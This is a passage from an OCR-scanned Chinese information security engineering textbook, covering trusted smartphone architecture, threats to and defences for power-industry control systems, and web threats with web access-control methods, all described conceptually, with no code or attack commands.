用 软件 的 方法 。 目 前 大 部 分 的 解决 方案 是 采用 应 用 层 软件 加 固 的 方法 ， 这 种 方法 与 PC 
上 的 杀毒 软件 所 采用 的 方法 类 似 ， 并 不 能 完全 解决 智能 手机 的 安全 隐患 。 

基于 体系 架构 的 方案 目前 常用 的 手段 是 采用 可 信 计 算 的 思想 ， 保 证 智能 手机 的 关键 
数据 不 被 破坏 ， 且 其 计算 结果 是 可 信 ， 是 符合 预期 的 。 

智能 手机 系统 有 别 于 通用 的 PC: 智能 手机 的 主要 芯片 是 一 个 SOC (System On Chip) 
芯片 ， 它 本 身 就 是 一 个 小 型 的 计算 机 系统 ，IO、 存 储 器 、 甚 至 部 分 的 模拟 电路 都 已 集成 
在 内 ; 智能 手机 中 CPU 系统 的 体系 结构 目前 采取 的 比较 多 的 是 哈弗 结构 , 即 数据 存储 器 
和 程序 存储 器 分 开 的 结构 。 因 此 在 结构 上 比 通用 的 PC 更 加 复杂 。 

国际 可 信 计 算 组 织 TCG (Trusted Computer Group ) 在 提出 了 四 种 可 信 平 台 : 可 信 
PC、 可 信服 务 器 、 可 信 手 机 、 可 信 智 能 手机 。 按 照 TCG 可 信 计 算 的 主要 思想 和 技术 路 
线 ， 首 先 需 要 建立 智能 手机 系统 的 可 信 根 ， 再 建立 一 条 从 可 信 根 出 发 的 信任 链 ， 一 级 测 
量 认证 一 级 ， 一 级 信任 一 级 ， 从 而 确保 整个 智能 手机 系统 的 可 信 性 。 

从 硬件 上 而 言 ， 要 求 TPM 〈 可 信 平 台 模块 ) 对 智能 手机 的 CPU 工作 安全 性 有 一 个 
比较 合理 的 控制 机 制 和 方法 ， 并 对 于 智能 手机 其 他 的 外 部 设备 进行 新 的 结构 安排 ;在 软 
件 上 ， 需 要 根据 硬件 的 结构 对 操作 系统 和 应 用 软件 进行 安全 性 增强 。 

同时 ， 作 为 一 个 应 用 性 很 强 的 设备 ， 可 信 智能 手机 应 该 具有 无 线 保密 通信 、GPS 等 
典型 的 功能 应 用 。 其 具体 方法 如 下 : 

1. 可 信 智能 终端 系统 的 体系 结构 

智能 手机 系统 常 采用 哈弗 结构 的 CPU， 并 且 CPU 内 集成 许多 的 外 部 设备 ， 在 不 改 
变 CPU 结构 的 前 提 下 ， 利 用 TPM 加 强 对 内 存 的 管理 ， 阻 断 对 系统 的 恶意 入 侵 和 误 操 作 
对 系统 的 损失 ， 包 括 对 于 智能 手机 设备 数据 存储 的 加 解密 等 新 技术 的 配合 。 

2. 可 信 智 能 终端 的 操作 系统 安全 增强 

智能 手机 系统 的 软件 体系 结构 和 传统 的 PC 略 有 不 同 ， 其 独特 的 BOOTLOADER ft 
* BIOS 全 面 管理 嵌入 式 系统 的 硬件 ， 根 据 上 述 可 信 智 能 手机 系统 的 硬件 体系 结构 的 特 
点 ， 有 必要 从 BOOTLOADER 内 容 开 始 ， 包 括 智能 手机 的 操作 系统 ， 进 行 安全 增强 的 改 
写 ， 以 配合 TPM 和 信任 链 的 结构 完成 整个 可 信 平 台 的 软件 系统 的 保障 。 

3. 可 信 智 能 终端 的 信任 链 结构 

信任 链 的 传递 是 体现 可 信和 的 重要 手段 ， 它 是 可 信 智 能 手机 平台 的 核心 机 制 。 但 应 该 
看 到 目前 的 信任 链 机 制 是 建立 在 传统 PC 的 体系 架构 之 上 的 ， 并 不 完全 符合 智能 手机 系 
统 的 实际 情况 ， 因 此 ， 需 要 新 的 实现 方式 来 体现 这 种 信任 的 传递 ， 对 于 信任 的 度量 、 存 
储 、 报 告 的 实现 机 制 进行 研究 。 目 前 ， 包 括 在 通用 PC 上 ， 完 整 的 信任 链 结构 以 及 信任 
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的 度量 、 存 储 、 报 告 机 制 还 没有 完全 实现 。 可 信 智 能 手机 应 该 实现 这 些 功能 。 

4. 可 信 智 能 终端 的 保密 通信 和 与 可 信和 网 络 连接 

可 信 智 能 手机 的 体系 结构 的 完成 仅仅 是 第 一 步 ， 更 重要 的 是 支持 传统 智能 手机 的 
固有 应 用 功能 。 无 线 通信 是 智能 手机 的 一 个 重要 的 应 用 功能 , 为 了 保证 传递 数据 安全 性 ， 
必须 首先 保证 通信 双方 的 身份 可 信 ， 并 对 通信 的 信息 或 数据 进行 加 密 ， 目 前 已 经 有 TNC 
(可 信和 网 络 连接 ) 等 技术 对 此 进行 研究 和 支撑 。 


4.6.4 工控 系统 安全 概述 及 解决 途径 


4.6.4.1 工控 系统 概述 

现代 工业 控制 系统 包括 过 程控 制 数 据 采 集 系统 (SCADA)、 分 布 式 控制 系统 (DCS)、 
程序 逻辑 控制 (PLO) 以 及 其 他 控制 系统 等 ， 目 前 已 广泛 应 用 于 电力 、 水 力 、 石 化 、 医 
药 、 食 品 以 及 汽车 、 航 天 等 工业 领域 ， 成 为 国家 关键 基础 设施 的 重要 组 成 部 分 ， 关 系 到 
国家 的 战略 安全 。 

但 在 中 国 ， 与 传统 的 网 络 与 信息 系统 安全 相 比 ， 工 业 控制 系统 信息 安全 保护 水 平 明 
显 偏 低 ， 长 期 以 来 没有 得 到 关注 。 大 多 数 的 工业 控制 系统 在 开发 设计 时 ， 只 考虑 了 效率 
和 实时 等 特性 ， 并 未 将 信息 安全 纳入 主要 考虑 的 指标 。 随 着 信息 化 的 推动 和 工业 化 进程 
的 加 速 ， 越 来 越 多 的 计算 机 和 网 络 技术 应 用 于 工业 控制 系统 ， 在 为 工业 生产 带 来 极 大 推 
动作 用 的 同时 ， 也 带 来 了 诸如 木马 、 病 毒 、 网 络 攻 击 等 安全 问题 。 近 年 来 ， 在 各 个 工业 
行业 频 发 的 信息 安全 事故 表明 ， 一 直 以 来 被 认为 相对 安全 、 相 对 封闭 的 工业 控制 系统 已 
经 成 为 不 法 组 织 和 黑客 的 攻击 目标 。 

工业 控制 系统 面临 的 威胁 是 多 样 化 的 ， 一 方面 ， 敌 对 政府 、 鸭 怖 组 织 、 商 业 间 谍 、 
内 部 不 法 人 员 、 外 部 非法 入 侵 者 等 对 系统 虎视 上 婉 ; 另 一 方面 ， 系 统 复杂 性 、 人 为 事故 、 
操作 失误 、 设 备 故障 和 自然 灾害 等 也 会 对 工业 控制 系统 造成 破坏 。 特 别 是 现代 计算 机 和 
网 络 技术 融合 进 工控 系统 后 ， 传 统 网 络 的 安全 问题 也 随 之 在 工控 系统 中 出 现 ， 这 其 中 就 
包括 用 户 可 以 随意 安装 、 运 行 各 类 应 用 软件 ， 访 问 各 类 网 站 信息 ， 为 病毒 、 木 马 等 恶意 
代码 进入 控制 系统 提供 了 主要 途径 ， 黑 客 可 以 利用 其 直接 自 改 控制 指令 ， 实 施 对 工业 控 
制 系 统 的 攻击 。 例 如 ， 木 马 程序 以 其 较 强 的 伪装 性 ， 常 隐藏 于 正常 的 运行 程序 之 下 ， 并 
能 通过 移动 存储 设备 经 系统 连接 节点 传播 至 整个 控制 网 络 ， 严 重 时 ， 可 使 整个 生产 、 工 
艺 流 程 次 病 。 绝 大 多 数 进入 系统 的 攻击 不 是 从 企业 网 络 就 是 通过 二 次 感染 的 途径 ， 如 笔 
记 本 电脑 、USB Key， 或 通过 虚拟 专用 网 络 CVPN) 及 调制 解 调 器 的 远程 访问 。 下 面 将 
针对 电力 行业 的 工控 系统 的 安全 分 析 和 防护 进行 介绍 。 

46.4.2 ”电力 工控 系统 安全 面临 的 威胁 与 对 策 

当前 ， 全 国电 力 系统 已 全 面部 署 了 高 度 自动 化 系统 ， 有 效 支撑 电力 调试 ， 广 泛 采 用 
SCADA 系统 进行 控制 。 大 中 城市 的 信息 化 、 智 慧 化 全 部 离 不 开 电 力 系 统 的 支持 ， 作 为 
信息 基础 设施 的 基础 ， 电 力 工控 系统 一 旦 出 现 风险 而 瘫痪 ,将 大 大 影响 人 们 的 生活 和 整 
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个 城市 的 运转 。 

电力 工控 系统 面临 的 主要 威胁 : 

1. 内 部 人 为 风险 

目前 ， 电 力行 业 工控 系统 主要 面临 的 人 为 风险 包括 以 下 两 个 方面 : 人 员 的 主观 有 意 
破坏 和 因 操 作 不 当 导致 的 无 意 破 坏 。 主 观 有 意 破坏 是 指 有 内 部 非 授权 人 员 有 意 无 意 偷 窃 
机 密 信息 、 更 改 系统 配置 和 记录 信息 、 内 部 人 员 破 坏 网 络 系统 ; 因 操 作 不 当 导致 的 无 意 
破坏 主要 有 操作 员 安 全 配置 不 当 、 资 源 访问 控制 设置 不 合理 、 用 户口 令 选择 不 慎 等 。 

2. 黑客 攻击 

黑客 攻击 是 系统 所 面临 的 最 大 威胁 。 从 国际 范围 来 看 , 电力 工控 系统 屡 受 黑客 攻击 ， 
针对 电力 系统 的 黑客 攻击 可 分 为 两 种 : 一 种 是 破坏 性 攻击 ， 以 某 种 方式 有 选择 地 破坏 系 
统 的 运行 有 效 性 和 数据 完整 性 ， 是 纯粹 的 信息 破坏 。 另 一 种 是 非 破坏 性 攻击 ， 是 在 不 影 
响 网 络 正常 工作 的 情况 下 进行 截获 、 窃 取 和 破译 以 获得 重要 信息 。 这 两 种 攻击 均 可 对 工 
控 系 统 网 络 造成 极 大 的 危害 ， 并 导致 机 密 数据 的 泄密 。 

3. 病毒 破坏 

伊朗 布 舍 尔 核电 站 的 遭遇 为 我 们 敲 响 了 和 警钟， 病毒 攻击 正在 从 开放 的 互联 网 向 封闭 
的 工控 网 蔓延 ， 动 机 从 技术 展示 到 利益 获取 发 展 到 如 今 的 高 端 性 攻击 。 据 权威 工业 安全 
事件 统计 显示 ， 截 止 到 2013 年 10 月 ， 全 球 已 发 生 300 余 起 针对 工业 控制 系统 的 攻击 事 
件 。2001 年 后 ， 通 用 开发 标准 与 互联 网 技术 的 广泛 使 用 ， 使 针对 电力 供应 和 电气 化 行业 
的 工控 系统 的 攻击 行为 出 现 大 幅度 增长 。 

4. 预 置 陷阱 

预 置 陷阱 是 指 在 工控 系统 的 软 硬 件 中 预 置 一 些 可 以 干扰 和 破坏 系统 运行 的 程序 或 
者 窃取 系统 信息 的 后 门 。 这 些 后 门 往往 是 软件 公司 的 编程 人 员 或 硬件 制造 商 为 了 方便 操 
作 而 设置 的 ， 一 般 不 为 人 所 知 。 一 旦 需要 ， 他 们 就 能 通过 后 门 越过 系统 的 安全 检查 以 非 
授权 方式 访问 系统 或 者 激活 事先 预 置 好 的 程序 ， 以 达到 破坏 系统 运行 的 目的 。 

5. 电力 工控 系统 采用 对 策 

(1) 加 强制 度 建设 和 人 员 管 理 

@ 加 强制 度 法 规 建设 。 为 适应 形势 发 展 需要 ， 电 力行 业 应 及 时 建立 并 不 断 完善 各 
种 安全 保障 的 法 规 、 制 度 ， 坚 持 依法 管理 工控 安全 。 法 律 规范 应 建立 在 安全 技术 标准 和 
实际 应 用 的 基础 之 上 ， 具 有 宏观 性 、 科 学 性 、 严 密 性 和 稳定 性 。 必 须 明 确 主体 、 用 户 和 
其 他 有 关 实 体 的 权利 和 职责 ， 安 全 监管 部 门 的 权利 和 职责 ， 对 奖励 与 处 罚 、 违 法 与 犯罪 
的 惩治 等 都 应 有 明确 的 规定 。 

@ 加 强人 员 管 理 教育 。 在 任何 系统 中 ， 人 都 是 最 活跃 的 因素 。 信 息 安全 保密 问题 
也 不 例外 ， 其 核心 问题 是 人 员 的 管理 和 教育 。 电 力 工控 系统 中 存在 的 大 量 重要 数据 是 电 
力 生产 单位 的 核心 资产 ， 可 以 关系 到 电力 生产 的 正常 运行 。 为 此 ， 在 考虑 信息 安全 的 综 
合 治理 时 ， 电 力行 业 首先 要 重点 抓 住 人 员 管 理 这 个 核心 。 国 内 外 大 量 危 害 信息 安全 的 事 


= 


bo | 


pg 


信息 安全 工程 师 教程 


件 ， 多 数 都 有 内 部 人 员 的 参与 。 因 而 必须 在 思想 品质 、 职 业 道 德 、 监 督 管理 、 规 章 制 度 
和 教育 培训 等 方面 下 功夫 ， 加 强 对 人 员 的 思想 教育 和 技术 培训 ， 防 止 人 为 主观 入 侵 事件 
的 发 生 ， 并 有 效 阻止 外 来 非法 访问 、 非 法 入 侵 ， 要 以 训练 技术 人 员 为 基础 ， 建 设 一 支 遵 
纪 守 法 、 精 通 本 职业 务 的 信息 安全 技术 队伍 ， 这 是 做 好 电力 工控 安全 保障 的 关键 。 

(2) 加 强 技术 防范 

@ 采用 访问 控制 策略 。 针 对 电力 系统 的 数据 保护 的 主要 任务 是 保证 系统 资源 不 被 
非法 使 用 和 非法 访问 。 访 问 控制 是 保证 工控 安全 最 重要 的 核心 策略 之 一 。 访 问 控制 策略 
包括 入 网 访问 控制 策略 、 操 作 权 限 控制 策略 、 目 录 安 全 控制 策略 、 属 性 安全 控制 策略 、 
系统 监测 和 锁定 控制 策略 ， 以 及 终端 节点 安全 控制 策略 等 方面 的 内 容 ， 一 般 采 用 基于 资 
源 的 集中 式 控制 、 基 于 目的 地 址 的 过 滤 管 理 以 及 网 络 签证 等 技术 来 实现 。 

@ 采用 加 密 技 术 。 信 息 数据 是 电力 工控 系统 的 核心 ， 也 是 攻击 与 防 攻击 博弈 的 焦 
点 ， 确 保 信 息 数据 使 用 安全 ， 成 为 系统 安全 防护 的 重 中 之 重 ， 密 码 技术 是 数据 保护 的 关 
键 技术 。 加 密 的 目的 是 保护 网 内 的 数据 、 文 件 、 口 令 和 控制 信息 ， 防 止 信息 的 非 授权 泄 
漏 。 通 过 加 密 技术 不 仅 可 以 有 效 地 对 抗 截获 、 非 法 访问 、 和 破坏 信息 的 完整 性 等 威胁 ， 还 
可 以 较 好 地 解决 伪造 、 抵 赖 、 冒 充 和 自 改 等 安全 问题 。 

© 采用 反 病毒 技术 。 反 病毒 技术 包括 预防 、 检 测 和 消除 病毒 等 技术 。 反 病毒 程序 
常 驻 内 存 ， 优 先 控制 系统 ， 监 视 和 判断 系统 中 是 否 有 病毒 存在 ， 进 而 阻止 病毒 进入 系统 
和 对 系统 进行 破坏 。 针 对 病毒 的 严重 性 ， 我 们 应 提高 防范 意识 ， 做 到 所 有 软件 必须 经 过 
严格 审查 ， 经 过 相应 的 控制 程序 后 才能 使 用 。 

G) 加 强 整体 防护 

DO 把 好 系统 设计 安全 关 。 系 统 设计 是 电力 工控 系统 与 信息 工程 建设 的 第 一 个 环节 ， 
要 遵循 业务 需求 与 安全 需求 同步 设计 的 原则 ， 在 工程 起 步 阶 段 就 要 紧 紧 抓 住 安全 工作 不 
放 ， 消 除 系统 结构 性 漏洞 ， 打 牢 系统 安全 防护 基础 ， 避 免 “ 亡 羊 补 牢 ”。 

© 把 好 产品 研发 与 设备 采购 关 。 把 好 产品 研发 和 设备 采购 关 ， 能 有 效 防止 存 有 漏 
洞 或 后 门 的 产品 进入 电力 系统 ， 是 保证 系统 安全 的 重要 环节 。 产 品 研发 包括 研发 过 程 要 
规范 ， 安 全 性 能 要 达标 ， 安 全 测试 要 同步 ， 测 评 机 构 要 权威 。 不 仅 要 进行 “基于 功能 
析 ” 的 符合 性 检测 ， 还 应 由 专业 机 构 进 行 “ 基 于 漏洞 分 析 ” 的 安全 性 检测 ， 深 刻 提 示 和 
准确 反映 产品 在 实际 应 用 中 的 安全 性 。 

@ 把 好 系统 安全 管理 关 。 大 量 事实 证 明 ， 管 理 漏洞 是 许多 电力 工控 系统 、 信 息 系 
统 出 现 故 障 的 主要 原因 ， 确 保 电力 系统 安全 ， 管 理 是 关键 ， 围 绕 系统 安全 管理 ， 要 重点 
抓 好 健全 领导 机 制 ， 完 善 管理 制度 和 人 员 管 理 3 项 基本 工作 。 要 加 强 工程 实施 和 竣工 验 
收 管理 ， 同 步 跟 踪 电 力 工 控 与 信息 系统 建设 的 全 过 程 ， 高 度 重视 竣工 验收 ， 随 时 发 现 和 
消除 各 种 安全 隐患 和 漏洞 。 要 加 强 电力 工控 与 信息 系统 运 维 管理 ， 必 须 严 格 按照 有 关 规 
定 ， 充 分 发 挥 人 、 设 备 和 制度 的 综合 功能 ， 有 效 保证 网 络 与 信息 系统 的 安全 运行 。 实 行 
电力 行业 系统 管理 、 安 全 管理 和 审计 管理 三 权 分 立 ， 定 期 检查 主机 系统 运行 环境 和 各 类 


第 4 章 信息 系统 安全 基础 


设备 配置 参数 的 安全 情况 ;建立 系统 安全 运行 管理 规程 ， 建 立 全 网 安全 管理 责任 制 ， 建 
立 系统 管理 者 常态 化 沟通 机 制 :， 严格 安全 监控 、 日 志 审计 ， 及 时 备份 和 补丁 更 新 等 管理 ; 
定期 报告 病毒 检测 和 安全 态势 情况 ; 关注 远程 维护 端口 状态 ， 切 断 透视 行为 。 

@ 把 好 系统 风险 评估 关 。 定 期 开展 安全 检测 和 风险 评估 ， 及 时 发 现 电 力 工控 系统 
存在 的 脆弱 性 和 漏洞 ， 评 估 可 能 面临 的 安全 风险 ， 并 对 发 现 的 安全 问题 进行 技术 加 固 ， 
是 电力 工控 系统 安全 防护 不 可 或 缺 的 一 项 重要 工作 。 评 估 形 式 有 运营 单位 自 评估 、 网 络 
运 维 商 评估 、 第 三 方 专业 机 构 评估 。 评 估 项 目 有 核心 关键 资产 分 析 、 安 全 威胁 分 析 与 识 
别 、 脆 弱 性 分 析 与 识别 、 安 全 防护 措施 有 效 性 分 析 与 验证 、 安 全 风险 关联 分 析 与 综合 态 
势 分 析 、 高 危 漏洞 修补 与 系统 加 固 。 

© 把 好 系统 威胁 监测 和 应 急 响 应 关 。 为 及 时 发 现 各 种 网 络 入 侵 攻 击 行为 ， 应 对 重 
要 的 电力 单位 工控 系统 网 络 端 节点 和 关键 数据 进行 威胁 监测 ， 以 掌握 主机 系统 、 邮 件 系 
统 、 网 络 和 网 站 的 运行 状况 和 安全 态势 。 应 急 响 应 是 应 对 信息 安全 事件 , 防止 事态 扩大 ， 
堵塞 漏洞 ， 减 少 损失 必 不 可 少 的 一 项 重要 工作 。 建 立 应 急 响 应 技术 团队 ， 制 定 应 急 响 应 
预案 ， 定 期 开展 应 急 演练 、 现 场 取 证 和 攻击 源 定位 、 系 统 和 数据 恢复 ， 以 及 安全 加 固 等 
工作 。 
4.6.4.3 总 结 

总 之 ， 工 控 系 统 信息 安全 不 是 一 个 单纯 的 技术 问题 ， 而 是 涉及 到 技术 、 管 理 、 流 程 、 
人 员 意 识 等 各 方面 的 系统 工程 ， 需 要 组 建 包 括 控制 工程 师 、 工 控 设 备 供应 商 、 系 统 集成 
商 、 信 息 安全 专家 等 成 员 的 工控 系统 信息 安全 队伍 。 结 合 工控 系统 自身 的 体系 结构 和 功 
能 特点 ， 在 监控 级 〈 如 : 工程 师 站 、 操 作 员 站 、 历 史 站 等 ) 和 网 络 层面 可 采取 现 有 等 级 
保护 的 相关 标准 和 规范 开展 等 级 测评 ， 在 控制 级 ， 应 加 强 对 Modbus, OPC 等 通信 协议 
的 使 用 管理 ， 对 其 用 户 身份 进行 鉴别 和 认证 ， 在 现场 级 ， 应 实现 对 设备 、 控 制 元 件 的 准 
入 检测 ， 加 快 建立 工控 设备 的 检测 标准 和 规范 ， 在 管理 上 ， 应 建立 完善 的 工控 系统 安全 
运 维 方案 、 策 略 和 计划 ， 加 强 日 常安 全 培训 ， 严 控 处 理 流程 ， 防 止 内 部 攻击 ， 实 现 终端 
安全 防护 ， 操 作 使 用 安全 ， 针 对 现 阶段 难以 解决 的 技术 问题 应 通过 管理 手段 进行 弥补 ， 
切实 提高 工控 系统 的 安全 防护 能 力 。 工 控 系统 信息 安全 是 一 个 动态 过 程 ， 需 要 在 整个 工 
业 基 础 设施 生命 周期 的 各 个 阶段 中 持续 实施 ， 不 断 完 善 改进 。 
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5.1 Web 安全 


5.1.1 Web 安全 威胁 


5111 概念 

从 某 种 程序 上 说 , 没有 Web 就 没有 Intemet。 然而 Web 应 用 程序 及 Web 站 点 往往 很 
容易 遭受 各 种 各 样 的 入 侵 ，Web 数据 在 网 络 传输 过 程 中 也 很 容易 被 窃取 或 盗用 。 因 此 如 
何 能 够 使 Web 及 数据 传输 更 加 安全 ， 就 显得 尤为 重要 。 

如 今 ，Web 业务 平台 已 经 在 电子 商务 、 企 业 信息 化 中 得 到 广泛 应 用 ， 很 多 企业 都 将 
应 用 架设 在 Web FAE, Web 业务 的 迅速 发 展 也 引起 了 黑客 们 的 强烈 关注 , 他 们 将 注意 
力 从 以 往 对 传统 网 络 服务 器 的 攻击 逐步 转移 到 了 对 Web 业务 的 攻击 上 。 黑客 利用 网 站 操 
作 系 统 的 漏洞 和 WEB 服务 程序 的 SQL 注入 漏洞 等 得 到 Web 服务 器 的 控制 权限 , PENSE 
改 网 页 内 容 ， 重 则 窃取 重要 内 部 数据 ， 更 为 严重 的 则 是 在 网 页 中 植 入 恶意 代码 ， 使 得 网 
站 访问 者 受到 侵害 。 

Web 威胁 的 目标 定位 有 多 个 维度 : 有 个 人 、 公 司 、 还 有 某 种 行业 ， 都 有 其 考虑 ， 甚 
至 国家 、 地 区 、 性 别 、 种 族 、 宗 教 等 也 成 为 发 动 攻击 的 原因 或 动机 。 

攻击 还 会 采用 多 种 形态 ， 甚 至 是 复合 形态 ， 比 如 病毒 、 蠕 虫 、 特 洛 伊 、 间 谍 软 件 、 
僵尸 、 网 络 钓 鱼 电 子 邮 件 、 漏 洞 利用 、 下 载 程序 、 社 会 工程 、rootkit、 黑 客 ， 结 果 都 可 
以 导致 用 户 信息 受到 危害 ， 或 者 导致 用 户 所 需 的 服务 被 拒绝 和 支持 。 

从 其 来 源 说 Web 威胁 还 可 以 分 为 内 部 攻击 和 外 部 攻击 两 类 。 前 者 主要 来 自信 任 网 
络 ， 可 能 是 用 户 执 行 了 未 授权 访问 或 是 无 意 中 定制 了 恶意 攻击 ;后 者 主要 是 由 于 网 络 漏 
洞 被 利用 或 者 用 户 受到 恶意 程序 制定 者 的 专 一 攻击 。 
5.1.1.2 分 类 

现在 的 黑客 日 益 聪明 , 前 一 段 时 间 的 “艳照 门 ”事件 和 抗震 救灾 期 间 的 “救灾 视频 ”， 
都 有 黑客 们 的 手脚 在 里 面 ， 他 们 往往 用 一 些 令 人 感 兴趣 的 东西 来 吸引 受害 者 ， 所 谓 愿 者 
上 钩 。 殊 不 知 ， 这 些 表面 的 东西 往往 包含 着 恶意 软件 ， 甚 至 rootkit 程序 。 根 据 赛 门 铁 克 
的 调查 ， 以 下 这 些 可 谓 最 具 危 险 性 的 Web 威胁 。 

(1) 可 信任 站 点 的 漏洞 

我 们 都 有 这 样 的 看 法 ， 大 的 知名 网 站 是 相对 安全 的 。 黑 客 们 也 知道 这 一 点 ， 他 们 会 
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想方设法 修改 这 些 网 站 的 网 页 ， 将 用 户 的 浏览 器 重新 导向 到 其 精心 打造 的 恶意 站 点 ， 这 
个 恶意 站 点 看 起 来 还 是 非常 可 信 的 。 但 在 用 户 向 其 中 输入 个 人 信息 时 ， 这 些 站 点 就 会 窃 
取 你 的 信息 ， 有 的 还 会 在 你 的 系统 上 种 上 点 东西 (如 间谍 软件 等 )， 或 者 破坏 你 的 邮件 地 
址 短 ， 肆 意 传播 垃圾 邮件 等 。 

(2) 浏览 器 和 浏览 器 插件 的 漏洞 

前 几 天 我 们 看 到 一 些 安全 专家 建议 不 要 使 用 正 浏览 器 .其实 其 他 的 浏览 器 也 并 非 无 
懈 可 击 ， 只 是 漏洞 暂时 还 不 太 多 或 者 说 是 攻击 者 对 其 关注 的 程度 还 不 够 高 而 已 。 不 管 哪 
种 浏览 器 ， 攻 击 者 都 可 以 利用 其 漏洞 或 其 插件 的 漏洞 将 恶意 软件 下 载 并 安装 到 用 户 计算 
机 上 ， 或 者 将 用 户 指引 到 一 个 恶意 站 点 。 

(3) 终端 用 户 

许多 攻击 者 都 是 从 终端 用 户 下 手 的 。 许 多 企业 面临 的 威胁 主要 是 由 于 其 针对 笔记 本 
电脑 、 桌 面 系统 、 服 务 器 、 未 受 保护 的 移动 设备 的 安全 策略 不 健全 造成 的 。 如 空 口令 、 
关闭 防火 墙 等 都 是 具体 表现 。 

(4) 可 移动 的 存储 设备 

由 于 TU 盘 、 移 动 硬盘 、MP3、MP4 等 设备 的 快速 流行 和 使 用 ， 恶 意 软件 也 可 以 轻易 
地 从 外 部 的 设备 传输 到 网 络 系统 中 。 此 外 , 插 到 iPod 中 的 插件 也 可 以 成 为 窃取 系统 数据 
的 重要 媒介 。 

(5) 网 络 钓 色 

网 络 骗子 伪造 冒 似 金 融 网 站 的 虚假 站 点 欺骗 消费 者 。 它 们 还 能 够 以 金融 公司 作为 其 
伪装 ， 在 电子 邮件 中 诱骗 消费 者 输入 其 个 人 机 密 信息 。 

(6) 伪 尸 网 络 

攻击 者 通过 隐藏 的 程序 控制 大 量 的 计算 机 系统 并 执行 多 任务 ， 如 发 送 垃圾 邮件 和 发 
动 拒绝 服务 攻击 等 。 

(7) 键盘 记录 程序 

黑客 在 用 户 的 系统 上 安装 可 以 记录 用 户 击 键 的 程序 ， 并 将 记录 的 结果 秘密 地 通过 电 
子 邮 件 发 送 到 黑客 的 邮箱 。 

(8) 多 重 攻击 

黑客 使 出 “组 合 拳 ”， 即 将 多 种 战术 结合 在 一 起 〈 如 综合 运用 键盘 记录 程序 、 僵 己 
网 络 、 钓 鱼 等 手段 ) 来 窃取 用 户 的 敏感 信息 。 此 外 ， 攻 击 者 还 可 以 通过 间谍 软件 窃取 个 
人 的 机 密 信 息 ， 并 能 够 通过 垃圾 邮件 传播 病毒 、 间 谍 软 件 、 木 马 等 。 

以 上 这 些 威胁 并 不 代表 全 部 ， 现 在 的 Web 威胁 日 益 体现 出 综合 化 ， 并 向 纵深 发 展 。 
以 前 攻击 者 主要 利用 操作 系统 漏洞 ， 现 在 对 应 用 软件 的 漏洞 越 来 越 感 兴趣 ;以 前 的 SQL 
攻击 可 以 检测 ， 现 在 却 越 来 越 难 ; 以 前 黑客 们 控制 一 两 台 计 算 机 ， 现 在 可 以 通过 一 个 网 
站 攻击 其 他 网 站 ， 并 感染 用 户 ， 进 而 构建 僵尸 网 络 ， 借 以 发 动 分 布 式 拒绝 服务 攻击 
(DDoS)。 因 此 任何 企业 都 应 当 重 视 防范 措施 的 多 样 性 和 多 重 性 ， 不 要 依赖 单纯 的 一 种 
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技术 。 
5.1.2 Web 威胁 防护 技术 


5.1.2.1 WEB 访问 安全 

1. Web 访问 控制 技术 

访问 控制 是 Web 站 点 安全 防范 和 保护 的 主要 策略 , 它 的 主要 任务 是 保证 网 络 资源 不 
被 非法 访问 者 访问 。 访问 Web 站 点 要 进行 用 户 名 、 用 户口 令 的 识别 与 验证 、 用 户 账号 的 
缺 省 限制 检查 。 只 要 其 中 任何 一 关 未 过 ， 该 用 户 便 不 能 进 人 某 站 点 进行 访问 。 

Web 服务 器 一 般 提 供 了 如 下 三 种 类 型 的 访问 控制 方法 。 

(1) 通过 下 地 址 、 子 网 或 域名 来 进行 控制 

只 有 当 浏 览 器 的 连接 请 求 是 从 某 个 IP 地 址 、IP 子 网 或 域 来 的 时 候 ， 才 允许 用 户 访 
问 被 保护 的 某 个 文档 ， 甚 至 整个 目录 。 从 其 他 的 未 被 允许 的 IP 地 址 、IP 子 网 域 发 来 的 
请 求 将 被 拒绝 。 

IP 地 址 限制 对 普通 的 情况 是 安全 的 ， 但 存在 隐患 。 攻 击 者 可 以 通过 伪造 PP 地 址 的 
方法 来 逃避 访问 控制 。 另 外 ， 也 不 能 保证 从 已 授权 的 地 址 的 主机 上 向 用 户 的 Web 服务 器 
请 求 连接 的 用 户 就 是 预期 的 用 户 。 远 程 主机 也 可 能 已 被 攻破 ， 而 被 用 来 作为 前 端 。 为 了 
安全 性 考虑 ， 卫 地 址 限制 必须 与 用 户 身份 检查 机 制 结合 起 来 ， 例 如 ， 检 查 用 户 名 /口令 。 
通过 主机 名 /域名 来 限制 访问 的 机 制 与 TP 地 址 限制 方法 存在 着 同样 的 问题 ， 但 这 种 方法 
还 额外 地 存在 着 “DNS 欺骗 ”的 危险 一 一 用 户 的 服务 器 被 欺骗 而 认为 一 个 信任 主机 名 属 
于 另 一 个 IP 地 址 。 为 了 减少 这 种 危险 ， 一 些 服务 器 可 以 配置 成 为 每 个 客户 完成 额外 的 
DNS 解析 。 当 把 到 来 的 请 求 的 IP 地 址 转换 成 主机 名 之 后 ， 该 服务 器 使 用 DNS 来 把 主机 
名 再 次 解析 成 人 P 地 址 ， 从 而 禁止 该 访问 请 求 。 如 果 服 务 器 运行 在 防火 墙 后 面 ， 该 防火 墙 
有 防止 和 发 现 IP 地 址 欺骗 的 功能 ， 那 么 P 地 址 限制 的 方法 会 更 安全 。 

(2) 通过 用 户 名 /口令 来 进行 访问 控制 

用 户 访 问 认证 机 制 通常 使 用 用 户 名 /口令 验证 方式 。 只 有 当 远 程 用 户 知道 用 户 名 和 对 
应 的 口令 的 时 候 ， 才 能 被 访问 。 这 种 使 用 用 户 名 /口令 来 限制 访问 的 方法 也 存在 着 问题 。 
口令 只 有 当选 择 很 难 猜 到 的 口令 时 才 有 效 。 很 多 情况 下 ， 用 户 习惯 于 选择 容易 被 猜 到 的 
口令 ， 例 如 ， 用 户 的 名 字 、 生 日 、 办 公 室 电话 号 码 或 他 们 的 宠物 等 等 。 这 些 口令 很 容易 
就 会 被 猜 到 。 而 且 , WWW 服务 与 UNIX 的 登录 不 同 , 不 能 控制 连接 不 成 功 的 最 大 次 数 ， 
这 就 更 为 网 络 黑客 猜 取 口令 提供 了 可 能 和 方便 。 通 过 一 个 口令 猜 取 程序 ， 总 有 一 天 ， 会 
猜 出 对 应 的 口令 来 。 

(3) 通过 公 钥 加 密 体 系 PKI 一 智能 认证 卡 来 进行 访问 控制 

在 操作 系统 中 ， 可 以 将 智能 卡 认证 和 公 钥 技术 结合 一 起 ， 以 提供 更 强 的 网 络 认 证 手 
段 或 作为 使 用 密码 的 一 种 替代 方式 。 它 们 使 得 身份 标识 信息 《例如 证 书 ) 可 以 被 携带 ， 
